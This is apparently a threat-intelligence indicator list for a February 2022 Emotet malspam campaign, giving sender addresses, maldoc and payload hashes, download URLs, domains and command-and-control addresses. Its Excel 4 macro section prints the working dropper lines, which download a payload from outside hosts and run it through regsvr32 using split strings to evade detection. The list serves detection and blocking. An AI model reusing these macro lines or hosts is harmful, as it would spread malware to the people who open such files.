2022-02-28 Emotet (E4) IOCs

THREAT IDENTIFICATION:  EMOTET (E4)

SUBJECTS OBSERVED
All subjects were from previusly stolen emails.

SENDERS OBSERVED
16459866210385643-9783-1-freedomdata.com@subscribe.globelinkww.com
branch02@arabianteahouse.net
damir.ramusovic@remex.ba
helgaardt@emssolutions.co.za
jtakada@kdk-kimoto.co.jp
kishor.kumar@xpressbees.com
lely@sdnindo.com
ogura@koei-t.net
projectadmin@daichindo-dsm.com
reporting@totalchemindo.co.id
reservation@hotelmarly.com
riska@pancaindah.com
rrhh@natural-life.com.ar
sharjeel.afridi@zindagitrust.org
sheba@gss.com.np
smize@medcaremso.com
t_uchiyama@miz-k.co.jp

XLSM MALDOC FILE HASHES
00bb3794cd1990282fdf1735f5db4f17
6b66d9e8b59ed0685a0045739c84150e
77aa12de0405ff31fc5a4b226326eb6a
7c1d3acbd43bbd2f3af201d200e0fe45
89f0b4e48bea1d7e4b241fc876e1ac10
a3725d21eb97651065bc151fad192ae0
b78cda8ff05bb82a5e246f71cec2aa6d

EXCEL4 MACROS
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carretilha.net/whats/RSL50BlRP0a6hj/","..\xxw1.ocx",0,0)
=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://shrinandrajoverseas.com/old/wQXty0wnVDY/","..\xxw1.ocx",0,0))
=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zionimoveis.com.br/wp-content/Bn00gaw/","..\xxw1.ocx",0,0))
=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://kontacsgo.pl/m/uwZYNUjGeWW/","..\xxw1.ocx",0,0))
=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vps36153.publiccloud.com.br/wp-admin/RfAZZ776uMNhSpOT/","..\xxw1.ocx",0,0))
=IF(DDWD4<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"egsv"&"r32.exe /s ..\xxw1.ocx")

EMOTET PAYLOAD DOWNLOAD URLS
https://carretilha.net/whats/RSL50BlRP0a6hj/
https://shrinandrajoverseas.com/old/wQXty0wnVDY/
https://zionimoveis.com.br/wp-content/Bn00gaw/
https://kontacsgo.pl/m/uwZYNUjGeWW/
http://vps36153.publiccloud.com.br/wp-admin/RfAZZ776uMNhSpOT/

EMOTET PAYLOAD DOWNLOAD DOMAINS
carretilha.net
shrinandrajoverseas.com
zionimoveis.com.br
kontacsgo.pl
publiccloud.com.br

EMOTET PAYLOAD FILE HASHES
40ea02a215d658b2f11f532120cb25ea
b46589156671b9d138210902460a53aa

EMOTET C2s
http://168.235.104.209:8080
http://195.154.253.60:8080
http://152.89.239.34:443
http://212.237.56.116:7080
http://45.118.115.99:8080
http://103.75.201.4:443
http://185.157.82.211:8080
http://119.235.255.201:8080
http://103.75.201.2:443
http://45.176.232.124:443
http://138.185.72.26:8080
http://79.172.212.216:8080
http://131.100.24.231:80
http://178.128.83.165:80
http://178.79.147.66:8080
http://110.232.117.186:8080
http://51.254.140.238:7080
http://173.212.193.249:8080
http://50.30.40.196:8080
http://50.116.54.215:443
http://82.165.152.127:8080
http://46.55.222.11:443
http://159.8.59.82:8080
http://217.182.143.207:443
http://58.227.42.236:80
http://107.182.225.142:8080
http://212.237.17.99:8080
http://162.243.175.63:443
http://158.69.222.101:443
http://209.126.98.206:8080
http://164.68.99.3:8080
http://176.104.106.96:8080
http://45.118.135.203:7080
http://212.24.98.99:8080
http://103.134.85.85:80
http://153.126.203.229:8080
http://195.154.133.20:443
http://129.232.188.93:443
http://207.38.84.195:8080
http://216.158.226.206:443
http://159.65.88.10:8080
http://31.24.158.56:8080
http://1.234.2.232:8080
http://203.114.109.124:443
http://81.0.236.90:443
http://45.142.114.231:8080